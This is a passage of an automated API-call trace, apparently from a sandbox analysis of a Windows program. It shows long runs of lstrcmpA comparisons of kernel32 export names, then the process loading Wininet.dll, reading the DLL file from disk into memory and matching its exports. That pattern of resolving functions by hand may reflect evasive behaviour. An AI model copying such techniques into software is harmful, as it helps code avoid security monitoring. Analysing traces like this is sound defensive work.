(lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0287.489] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0287.489] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0287.489] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0287.489] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0287.489] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0287.489] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0287.489] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0287.490] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0287.490] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0287.490] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0287.490] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0287.490] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0287.490] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0287.490] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0287.490] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0287.490] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0287.490] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0287.490] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0287.490] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0287.490] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0287.490] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0287.490] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0287.491] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0287.491] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0287.491] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0287.491] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0287.491] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0287.491] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0287.491] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0287.491] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0287.491] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0287.491] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0287.491] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0287.491] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0287.491] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0287.492] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0287.492] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0287.492] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0287.492] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0287.492] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0287.492] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0287.492] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0287.492] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0287.492] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0287.492] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0287.492] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0287.492] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0287.492] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0287.493] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0287.493] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0287.493] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0287.493] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0287.493] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0287.493] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0287.493] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0287.493] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0287.493] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0287.493] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0287.493] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0287.493] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0287.493] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0287.493] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0287.493] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0287.493] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0287.493] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0287.493] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0287.494] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0287.494] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0287.494] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0287.494] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0287.494] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0287.494] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0287.494] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0287.494] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0287.494] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0287.494] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0287.494] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0287.494] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0287.494] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0287.494] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0287.494] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0287.494] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0287.494] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0287.494] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0287.495] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0287.495] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0287.495] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0287.495] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0287.495] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0287.495] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0287.495] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0287.495] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0287.495] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0287.495] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0287.495] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0287.495] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0287.495] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0287.495] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0287.495] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0287.496] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0287.496] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0287.496] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0287.496] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0287.496] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0287.496] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0287.496] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0287.496] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0287.496] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0287.496] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0287.496] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0287.496] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0287.496] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0287.496] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0287.496] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0287.496] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0287.496] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0287.497] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0287.497] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0287.497] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0287.497] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0287.497] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0287.497] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0287.497] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0287.498] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0287.498] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0287.498] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0287.498] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0287.498] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0287.498] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0287.498] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0287.498] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0287.498] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0287.498] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0287.498] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0287.498] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0287.498] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0287.498] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0287.498] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0287.498] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0287.498] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0287.499] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0287.499] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0287.499] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0287.499] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0287.499] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0287.499] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0287.499] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0287.499] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0287.499] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0287.499] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0287.500] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0287.500] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0287.500] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0287.500] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0287.500] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0287.500] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0287.500] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0287.500] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0287.500] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0287.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0287.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0287.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0287.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0287.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0287.501] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0287.501] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0287.501] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0287.501] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0287.501] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0287.501] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0287.501] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0287.501] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0287.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0287.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0287.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0287.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0287.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0287.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0287.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0287.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0287.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0287.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0287.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0287.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0287.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0287.503] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0287.503] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0287.503] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0288.757] GetProcessHeap () returned 0x5d0000 [0288.757] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5fc5f0 | out: hHeap=0x5d0000) returned 1 [0288.757] GetProcessHeap () returned 0x5d0000 [0288.757] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x5e9340 [0288.757] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0288.921] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0288.923] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0288.923] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0288.923] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0288.923] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0288.923] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0288.924] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0288.924] GetProcessHeap () returned 0x5d0000 [0288.924] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x286600) returned 0x4001040 [0288.931] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0288.932] ReadFile (in: hFile=0x140, lpBuffer=0x4001040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4001040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0289.248] CloseHandle (hObject=0x140) returned 1 [0289.249] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0289.249] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0289.249] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0289.249] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0289.249] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0289.249] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0289.249] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0289.249] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0289.249] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0289.249] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0289.249] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0289.249] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0289.249] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0289.249] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0289.249] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0289.249] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0289.250] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0289.250] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0289.250] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0289.250] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0289.250] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0289.250] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0289.250] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0289.250] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0289.250] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0289.250] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0289.250] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0289.250] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0289.250] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0289.250] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0289.250] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0289.250] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0289.250] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0289.250] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0289.250] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0289.250] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0289.250] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0289.250] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0289.250] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0289.251] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0289.251] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0289.251] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0289.251] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0289.251] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0289.251] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0289.251] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0289.251] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0289.251] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0289.251] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0289.251] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0289.251] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0289.251] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0289.251] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0289.251] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0289.251] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0289.251] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0289.251] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0289.251] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0289.251] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0289.251] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0289.251] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0289.251] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0289.252] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0289.252] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0289.252] lstrcmpA 